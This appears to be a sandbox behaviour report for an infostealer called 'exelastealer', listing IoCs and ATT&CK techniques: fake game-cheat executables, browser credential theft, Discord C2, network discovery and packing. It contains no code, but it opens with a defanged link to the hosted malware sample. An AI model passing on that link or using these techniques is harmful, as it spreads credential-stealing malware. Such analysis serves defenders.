exelastealer | hxxps://mega[.]nz/folder/NNhizKIY#_598We3JUoSu2eXAdjgzhg

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	FortniteAimbotESPcracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	FortniteAimbotESPcracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	nssdbm3.cfg
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	FortniteAimbotESPcracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Playstation Checker.exe

Clipboard Data 1 TTPs 6 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2780	cmd.exe
7372	powershell.exe
8876	cmd.exe
8264	powershell.exe
6740	cmd.exe
9028	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
5516	Nitro MultiTool.exe
1072	vshost.exe
3852	nssdbm3.cfg
3156	winst.exe
3712	BlackFollow.exe
1492	Windows Explorer.exe
3108	BlackFollow.exe
5836	Windows Explorer.exe
336	ldap60.bin
5096	ldap60.bin
4404	BlackFollow.exe
1420	Windows Explorer.exe
1084	BlackFollow.exe
8496	Windows Explorer.exe
3244	ldap60.bin
1144	ldap60.bin
3588	FortniteAimbotESPcracked.exe
6288	Windows Explorer.exe
6468	Windows Explorer.exe
8732	Playstation Checker.exe
548	Windows Explorer.exe
7856	Playstation Checker.exe
7960	Windows Explorer.exe
8472	Windows Explorer.exe
4996	Playstation Checker.exe
5224	Windows Explorer.exe
7776	Windows Explorer.exe
652	Playstation Checker.exe
5732	Windows Explorer.exe
6360	Windows Explorer.exe
8396	Playstation Checker.exe
4732	Windows Explorer.exe
6840	Windows Explorer.exe
676	Playstation Checker.exe
6888	Windows Explorer.exe
2536	Windows Explorer.exe
7912	Playstation Checker.exe
7660	Windows Explorer.exe
3160	Windows Explorer.exe
8852	Windows Explorer.exe
8968	Playstation Checker.exe
8484	Windows Explorer.exe
8628	Playstation Checker.exe
7400	Windows Explorer.exe
8132	Windows Explorer.exe
5124	Playstation Checker.exe
2020	Windows Explorer.exe
4656	Windows Explorer.exe
4860	Playstation Checker.exe
5132	Windows Explorer.exe
8916	Windows Explorer.exe
9124	Playstation Checker.exe
8564	Windows Explorer.exe
1552	Windows Explorer.exe
5780	Windows Explorer.exe
856	Playstation Checker.exe
8800	Windows Explorer.exe
8568	Windows Explorer.exe
1608	Playstation Checker.exe
5884	Windows Explorer.exe
6416	Playstation Checker.exe
6248	Windows Explorer.exe
232	Windows Explorer.exe
6620	Playstation Checker.exe

Loads dropped DLL 64 IoCs

pid	Process
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5836	Windows Explorer.exe
5096	ldap60.bin
5096	ldap60.bin
5836	Windows Explorer.exe
5096	ldap60.bin
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5096	ldap60.bin
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
5836	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
8496	Windows Explorer.exe
1144	ldap60.bin
1144	ldap60.bin
1144	ldap60.bin
1144	ldap60.bin
8496	Windows Explorer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0007000000023d6f-354.dat	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
128	discord.com
129	discord.com
150	discord.com
264	discord.com
280	discord.com
130	discord.com
207	discord.com
263	discord.com
289	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
124	ip-api.com
261	ip-api.com
293	ip-api.com

Network Service Discovery 1 TTPs 6 IoCs

Attempt to gather information on host's network.

Network Service Discovery

T1046

pid	Process
8444	cmd.exe
1272	ARP.EXE
4260	cmd.exe
6716	ARP.EXE
7532	cmd.exe
4496	ARP.EXE

Enumerates processes with tasklist 1 TTPs 15 IoCs

persistence privilege_escalation

Process Discovery

T1057

pid	Process
6304	tasklist.exe
5960	tasklist.exe
6056	tasklist.exe
5312	tasklist.exe
9176	tasklist.exe
7296	tasklist.exe
4852	tasklist.exe
6344	tasklist.exe
1088	tasklist.exe
8156	tasklist.exe
6856	tasklist.exe
8768	tasklist.exe
7352	tasklist.exe
8188	tasklist.exe
4548	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5008	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5096	ldap60.bin
1144	ldap60.bin

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023dd5-429.dat	upx
behavioral1/memory/5836-433-0x00007FFEAAC30000-0x00007FFEAB220000-memory.dmp	upx
behavioral1/files/0x0008000000023da3-436.dat	upx
behavioral1/files/0x0007000000023dcf-441.dat	upx
behavioral1/files/0x0007000000023dd6-446.dat	upx
behavioral1/memory/5836-457-0x00007FFEC7BB0000-0x00007FFEC7BBF000-memory.dmp	upx
behavioral1/memory/5836-464-0x00007FFEC60A0000-0x00007FFEC60B9000-memory.dmp	upx
behavioral1/memory/5836-470-0x00007FFEC6070000-0x00007FFEC609D000-memory.dmp	upx
behavioral1/memory/5836-460-0x00007FFEC60C0000-0x00007FFEC60CD000-memory.dmp	upx
behavioral1/memory/5836-459-0x00007FFEC60D0000-0x00007FFEC60E9000-memory.dmp	upx
behavioral1/memory/5836-456-0x00007FFEC60F0000-0x00007FFEC6114000-memory.dmp	upx
behavioral1/files/0x0007000000023da9-455.dat	upx
behavioral1/files/0x0007000000023da8-454.dat	upx
behavioral1/files/0x0007000000023da7-453.dat	upx
behavioral1/files/0x0007000000023da6-452.dat	upx
behavioral1/files/0x0009000000023da0-451.dat	upx
behavioral1/files/0x0008000000023d9d-450.dat	upx
behavioral1/files/0x0008000000023d9a-449.dat	upx
behavioral1/files/0x0007000000023dd8-448.dat	upx
behavioral1/files/0x0007000000023dd7-447.dat	upx
behavioral1/files/0x0007000000023dd3-445.dat	upx
behavioral1/files/0x0007000000023dd0-444.dat	upx
behavioral1/files/0x0007000000023dce-443.dat	upx
behavioral1/memory/5836-480-0x00007FFEC6040000-0x00007FFEC6063000-memory.dmp	upx
behavioral1/memory/5836-486-0x00007FFEAD110000-0x00007FFEAD286000-memory.dmp	upx
behavioral1/memory/5836-488-0x00007FFEBD650000-0x00007FFEBD683000-memory.dmp	upx
behavioral1/memory/5836-487-0x00007FFEAAC30000-0x00007FFEAB220000-memory.dmp	upx
behavioral1/memory/5836-491-0x00007FFEAC8B0000-0x00007FFEAC97D000-memory.dmp	upx
behavioral1/memory/5836-600-0x00007FFEC60D0000-0x00007FFEC60E9000-memory.dmp	upx
behavioral1/memory/5836-1758-0x00007FFEBA470000-0x00007FFEBA492000-memory.dmp	upx
behavioral1/memory/5836-1759-0x00007FFEC6040000-0x00007FFEC6063000-memory.dmp	upx
behavioral1/memory/5836-1764-0x00007FFEAD0D0000-0x00007FFEAD0EE000-memory.dmp	upx
behavioral1/memory/5836-1767-0x00007FFEADD10000-0x00007FFEADD29000-memory.dmp	upx
behavioral1/memory/5836-1766-0x00007FFEAD110000-0x00007FFEAD286000-memory.dmp	upx
behavioral1/memory/5836-1765-0x00007FFEA6C70000-0x00007FFEA7362000-memory.dmp	upx
behavioral1/memory/5836-1763-0x00007FFEAD0F0000-0x00007FFEAD101000-memory.dmp	upx
behavioral1/memory/5836-1762-0x00007FFEADCC0000-0x00007FFEADD0A000-memory.dmp	upx
behavioral1/memory/5836-1761-0x00007FFEB5870000-0x00007FFEB5887000-memory.dmp	upx
behavioral1/memory/5836-1760-0x00007FFEA8C80000-0x00007FFEA91A9000-memory.dmp	upx
behavioral1/memory/5836-1245-0x00007FFEAAB10000-0x00007FFEAAC2C000-memory.dmp	upx
behavioral1/memory/5836-547-0x00007FFEBE640000-0x00007FFEBE652000-memory.dmp	upx
behavioral1/memory/5836-1770-0x00007FFEAC7C0000-0x00007FFEAC7F8000-memory.dmp	upx
behavioral1/memory/5836-1768-0x00007FFEBD650000-0x00007FFEBD683000-memory.dmp	upx
behavioral1/memory/5836-670-0x00007FFEBDE30000-0x00007FFEBDE44000-memory.dmp	upx
behavioral1/memory/5836-669-0x00007FFEBE1E0000-0x00007FFEBE1F4000-memory.dmp	upx
behavioral1/memory/5836-492-0x00007FFEBEFF0000-0x00007FFEBF005000-memory.dmp	upx
behavioral1/memory/5836-489-0x00007FFEA8C80000-0x00007FFEA91A9000-memory.dmp	upx
behavioral1/memory/5836-1782-0x00007FFEAC8B0000-0x00007FFEAC97D000-memory.dmp	upx
behavioral1/memory/5836-1793-0x00007FFEBE640000-0x00007FFEBE652000-memory.dmp	upx
behavioral1/memory/5836-1792-0x00007FFEBEFF0000-0x00007FFEBF005000-memory.dmp	upx
behavioral1/memory/5836-1831-0x00007FFEC35A0000-0x00007FFEC35AD000-memory.dmp	upx
behavioral1/memory/5836-1850-0x00007FFEBA470000-0x00007FFEBA492000-memory.dmp	upx
behavioral1/memory/5836-1855-0x00007FFEADCC0000-0x00007FFEADD0A000-memory.dmp	upx
behavioral1/memory/5836-1854-0x00007FFEB5870000-0x00007FFEB5887000-memory.dmp	upx
behavioral1/memory/5836-1856-0x00007FFEA6C70000-0x00007FFEA7362000-memory.dmp	upx
behavioral1/memory/5836-1889-0x00007FFEADD10000-0x00007FFEADD29000-memory.dmp	upx
behavioral1/memory/5836-1891-0x00007FFEAC7C0000-0x00007FFEAC7F8000-memory.dmp	upx
behavioral1/memory/5836-1893-0x00007FFEC35A0000-0x00007FFEC35AD000-memory.dmp	upx
behavioral1/memory/8496-1976-0x00007FFEAEE30000-0x00007FFEAF420000-memory.dmp	upx
behavioral1/memory/8496-1996-0x00007FFEC7BF0000-0x00007FFEC7BFF000-memory.dmp	upx
behavioral1/memory/8496-1995-0x00007FFEC2740000-0x00007FFEC2764000-memory.dmp	upx
behavioral1/memory/8496-2003-0x00007FFEC6030000-0x00007FFEC603D000-memory.dmp	upx
behavioral1/memory/8496-2002-0x00007FFEC2AD0000-0x00007FFEC2AE9000-memory.dmp	upx
behavioral1/memory/8496-2006-0x00007FFEBE200000-0x00007FFEBE22D000-memory.dmp	upx

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6548	sc.exe
8488	sc.exe
2412	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023d6e-342.dat	pyinstaller
behavioral1/files/0x000d000000023b8d-362.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nitro MultiTool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vshost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlackFollow.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlackFollow.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
7608	netsh.exe
7444	cmd.exe
5880	cmd.exe
1628	netsh.exe
1724	cmd.exe
5032	netsh.exe

System Network Connections Discovery 1 TTPs 3 IoCs

Attempt to get a listing of network connections.

System Network Connections Discovery

T1049

pid	Process
4180	NETSTAT.EXE
5284	NETSTAT.EXE
5964	NETSTAT.EXE

Collects information from the system 1 TTPs 3 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
7860	WMIC.exe
8524	WMIC.exe
8832	WMIC.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
8828	WMIC.exe
6764	WMIC.exe
2776	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
5964	NETSTAT.EXE
8184	ipconfig.exe
4180	NETSTAT.EXE
6488	ipconfig.exe
5284	NETSTAT.EXE
6628	ipconfig.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
7636	systeminfo.exe
1556	systeminfo.exe
2564	systeminfo.exe

Kills process with taskkill 27 IoCs

evasion

pid	Process
6732	taskkill.exe
3600	taskkill.exe
7768	taskkill.exe
6932	taskkill.exe
4920	taskkill.exe
5220	taskkill.exe
9128	taskkill.exe
3160	taskkill.exe
3388	taskkill.exe
6640	taskkill.exe
6652	taskkill.exe
7008	taskkill.exe
7540	taskkill.exe
6488	taskkill.exe
3760	taskkill.exe
6108	taskkill.exe
7476	taskkill.exe
7036	taskkill.exe
6844	taskkill.exe
6924	taskkill.exe
8072	taskkill.exe
4252	taskkill.exe
5792	taskkill.exe
4976	taskkill.exe
6388	taskkill.exe
6564	taskkill.exe
6816	taskkill.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	OpenWith.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
6164	schtasks.exe
6236	schtasks.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
3528	msedge.exe
3528	msedge.exe
1608	msedge.exe
1608	msedge.exe
4568	identity_helper.exe
4568	identity_helper.exe
2940	msedge.exe
2940	msedge.exe
5448	msedge.exe
5448	msedge.exe
1924	msedge.exe
1924	msedge.exe
1924	msedge.exe
1924	msedge.exe
7372	powershell.exe
7372	powershell.exe
7372	powershell.exe
9136	msedge.exe
9136	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
7520	identity_helper.exe
7520	identity_helper.exe
5260	msedge.exe
5260	msedge.exe
8384	msedge.exe
8384	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
8264	powershell.exe
8264	powershell.exe
8268	msedge.exe
8268	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
5856	identity_helper.exe
5856	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 31 IoCs

pid	Process
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5128	7zG.exe
Token: 35	5128	7zG.exe
Token: SeSecurityPrivilege	5128	7zG.exe
Token: SeSecurityPrivilege	5128	7zG.exe
Token: SeDebugPrivilege	8768	tasklist.exe
Token: SeIncreaseQuotaPrivilege	8816	WMIC.exe
Token: SeSecurityPrivilege	8816	WMIC.exe
Token: SeTakeOwnershipPrivilege	8816	WMIC.exe
Token: SeLoadDriverPrivilege	8816	WMIC.exe
Token: SeSystemProfilePrivilege	8816	WMIC.exe
Token: SeSystemtimePrivilege	8816	WMIC.exe
Token: SeProfSingleProcessPrivilege	8816	WMIC.exe
Token: SeIncBasePriorityPrivilege	8816	WMIC.exe
Token: SeCreatePagefilePrivilege	8816	WMIC.exe
Token: SeBackupPrivilege	8816	WMIC.exe
Token: SeRestorePrivilege	8816	WMIC.exe
Token: SeShutdownPrivilege	8816	WMIC.exe
Token: SeDebugPrivilege	8816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	8816	WMIC.exe
Token: SeRemoteShutdownPrivilege	8816	WMIC.exe
